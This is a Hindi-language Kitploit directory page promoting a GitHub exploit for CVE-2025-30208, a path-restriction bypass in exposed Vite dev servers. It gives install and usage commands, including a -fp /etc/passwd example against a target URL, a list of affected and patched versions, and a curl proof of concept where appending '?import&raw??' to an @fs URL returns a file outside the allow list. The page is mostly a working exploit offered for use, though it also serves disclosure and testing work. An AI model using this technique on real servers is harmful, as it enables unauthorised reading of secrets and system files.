Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30208 — यह एक्सप्लॉइट केवल शैक्षिक और नैतिक सुरक्षा परीक्षण उद्देश्यों के लिए है। पूर्व पारस्परिक सहमति के बिना लक्ष्यों के विरुद्ध इस एक्सप्लॉइट का उपयोग अवैध है, और डेवलपर इस एक्सप्लॉइट के दुरुपयोग या उससे होने वाली क्षति के लिए किसी भी देयता को अस्वीकार करता है। | Kitploit
उपकरण/GitHubGitHub/on1onss/cve-2025-30208
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubon1onss/cve-2025-30208

CVE-2025-30208

यह एक्सप्लॉइट केवल शैक्षिक और नैतिक सुरक्षा परीक्षण उद्देश्यों के लिए है। पूर्व पारस्परिक सहमति के बिना लक्ष्यों के विरुद्ध इस एक्सप्लॉइट का उपयोग अवैध है, और डेवलपर इस एक्सप्लॉइट के दुरुपयोग या उससे होने वाली क्षति के लिए किसी भी देयता को अस्वीकार करता है।

रिपॉजिटरी देखें
47 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-30208

[!IMPORTANT]

अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और नैतिक सुरक्षा परीक्षण उद्देश्यों के लिए है। पूर्व आपसी सहमति के बिना लक्ष्यों के विरुद्ध इस एक्सप्लॉइट का उपयोग अवैध है, और इस एक्सप्लॉइट के दुरुपयोग या क्षति के लिए डेवलपर कोई दायित्व अस्वीकार करता है।

स्थापना

root@kitploit:~
git clone https://github.com/On1onss/CVE-2025-30208.git
cd CVE-2025-30208
pip install -r requirements.txt

उपयोग

root@kitploit:~
python CVE-2025-30208.py [-h] [-t <Target URL>] [-fp <File Path>] [-i]

options:
  -h, --help       show this help message and exit
  -t <Target URL>  Example: -t http://localhost:5173/
  -fp <File Path>  Example: -fp /etc/passwd
  -i               Interactive mode

विवरण

प्रभावित संस्करण

root@kitploit:~
>= 6.2.0, < 6.2.3
>= 6.1.0, < 6.1.2
>= 6.0.0, < 6.0.12
>= 5.0.0, < 5.4.15
< 4.5.10

पैच किए गए संस्करण

root@kitploit:~
6.2.3
6.1.2
6.0.12
5.4.15
4.5.10

सारांश

मनमानी फ़ाइलों की सामग्री ब्राउज़र को लौटाई जा सकती है।

प्रभाव

केवल वे ऐप्स प्रभावित होते हैं जो स्पष्ट रूप से Vite डेव सर्वर को नेटवर्क पर एक्सपोज़ करते हैं (--host या server.host कॉन्फ़िगरेशन विकल्प का उपयोग करके)।

विस्तार

@fs Vite सर्विंग अनुमति सूची के बाहर की फ़ाइलों तक पहुंच से इनकार करता है। URL में ?raw?? या ?import&raw?? जोड़ने से यह सीमा बायपास हो जाती है और फ़ाइल यदि मौजूद है तो उसकी सामग्री लौटा दी जाती है। यह बायपास इसलिए है क्योंकि ? जैसे ट्रेलिंग सेपरेटर कई स्थानों पर हटा दिए जाते हैं, लेकिन क्वेरी स्ट्रिंग रेगेक्स में उनका हिसाब नहीं रखा जाता।

PoC

root@kitploit:~
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
# sourceMappingURL=data:application/json;base64,eyJ2...

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • https://github.com/advisories/GHSA-x574-m823-4x7w
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57
टूल डाउनलोड करें